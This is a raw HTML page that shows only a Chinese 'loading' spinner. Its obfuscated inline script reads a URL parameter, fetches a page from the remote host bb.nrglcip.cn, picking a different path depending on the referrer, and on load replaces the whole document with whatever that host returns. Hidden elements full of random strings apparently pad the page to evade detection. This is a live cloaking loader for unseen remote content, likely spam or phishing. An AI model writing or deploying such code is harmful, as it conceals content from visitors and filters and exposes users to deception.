<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .bYRZfe {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .bYRZfe .hDEFkxWPM {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .bYRZfe .content {
            line-height: 50px;
            text-align: center
        }

        .bYRZfe .img {
            width: 100%
        }

        .bYRZfe .YBuS1Rgy3K {
            text-align: center
        }

        .bYRZfe .YBuS1Rgy3K span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .bYRZfe .YBuS1Rgy3K span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .bYRZfe .YBuS1Rgy3K span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .bYRZfe .YBuS1Rgy3K span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .bYRZfe .YBuS1Rgy3K span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .bYRZfe .YBuS1Rgy3K span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .bYRZfe .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Q1XuuVHXWLm43(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Y1yTJp = Q1XuuVHXWLm43('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Y1yTJp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Y1yTJp +".html?a=share";
		}
		
        wBotaSiM9=url+"#"+new Date().getTime();
        wBotaSiM9 && function() {
            $.get(wBotaSiM9, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >p6mYOcnOL8VtGH5q8XBfhIUBPYCZ7w3wI0SOw08mJ9LqZeENTXQQP20biJXvpy</h1>
<div style='display:none'>lDWlqZWiEpdKfOFqWh5KdYpBGGjjL0HBPEU8dcAnP4P58IZKfeXNcZVHvGIPPtqdQN9Q9HxU8bZpert4ad4r3hyOP9pFj6</div>
<p  style='display:none'>AXfJlFQom4ZpJ7d04YDYP08XtJmPJAzl7EgMGzshVch2f7s0vDHOX3m2SxNM3MZCh</p>
<ul style='display:none' >XlMmyrqJZwyq3b502QUyFel2a7JQvVX94v6GcmTY24R3Mda1fYeVYHTHyFMp72fHxI0Avp1Lz</ul>
<a  href='#' style='display:none'>kdLVx2KvBe46QTeVvnB84wNpyKl6QELLVWrjEt5NKgxl6CqXaqfDqdPrRDZulH5poAzGvFvyKbhKoa09w2nwiqZBKiKKrkDx08G</a>
<p  style='display:none'>AXfJlFQom4ZpJ7d04YDYP08XtJmPJAzl7EgMGzshVch2f7s0vDHOX3m2SxNM3MZCh</p>
<b style='display:none' >uA8zrkfKjvDrWk2p7pdkhnqjcKAkHTou9KlhOGfZDoAYXdGb5B73MOy7YcgCmP3vBTf48X4Nw5W5nT7r</b><div class="bYRZfe">
    <div class="hDEFkxWPM">
        <div class="YBuS1Rgy3K">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >lvjsea2FiPQ0juVUDqMZEAqRlk2</li>
<p  style='display:none'>dMCdx5M4FeRx1Z2MF6G01GffuCzJ</p>
<b style='display:none' >ntgAcwCHCIt6SrsQK2D994UMtQM952jfxXi4tRpJNjkiNOWnabG6FxJW9sNoLzKZj3Ln0BfW6fKeiVtWBGtG77lJGzAI</b>
<ul style='display:none' >ReLi0A5kq1pLxEeoyWPuCX</ul>
<a  href='#' style='display:none'>TOyTBCOr4juTxEFGBpkheNs5</a>
<li style='display:none' >lvjsea2FiPQ0juVUDqMZEAqRlk2</li>
<a  href='#' style='display:none'>TOyTBCOr4juTxEFGBpkheNs5</a>
<ul style='display:none' >ReLi0A5kq1pLxEeoyWPuCX</ul>
<p  style='display:none'>dMCdx5M4FeRx1Z2MF6G01GffuCzJ</p>
<img  src='' style='display:none'></body>
</html>